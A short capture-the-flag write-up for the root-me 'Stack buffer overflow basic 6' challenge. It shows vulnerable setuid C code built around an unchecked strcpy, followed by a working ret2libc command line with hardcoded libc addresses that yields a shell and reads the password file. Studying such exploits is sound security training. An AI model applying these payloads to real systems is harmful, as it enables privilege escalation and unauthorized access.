ELF x86: Stack buffer overflow basic 6

root-me challenge:

Environment configuration:

PIE 	Position Independent Executable 	 No 
RelRO 	Read Only relocations 	                 No 
NX 	Non-Executable Stack 	                 Yes 
ASLR 	Address Space Layout Randomisation 	 No 
SF 	Source Fortification 	                 No 
SSP 	Stack-Smashing Protection 	         No 
SRC 	Source code access 	                 Yes

Source code:

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
 
int main (int argc, char ** argv){
    char message[20];
 
    if (argc != 2){
        printf ("Usage: %s <message>\n", argv[0]);
        return -1;
    }
 
    setreuid(geteuid(), geteuid());
    strcpy (message, argv[1]);
    printf ("Your message: %s\n", message);
    return 0;
}

app-systeme-ch33@challenge02:~$ ./ch33 `python -c "print 'A'*32 + '\x10\x33\xe6\xb7' + 'DDDD' + '\x4c\x5d\xf8\xb7'"`
Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�3��DDDDL]��

$ cat .passwd

Resources

Counter moves

The final stack step assembles the full primitive. Layered mitigations are what make it costly in the real world. The defensive counterpart is in the blue notes on memory corruption and its limits.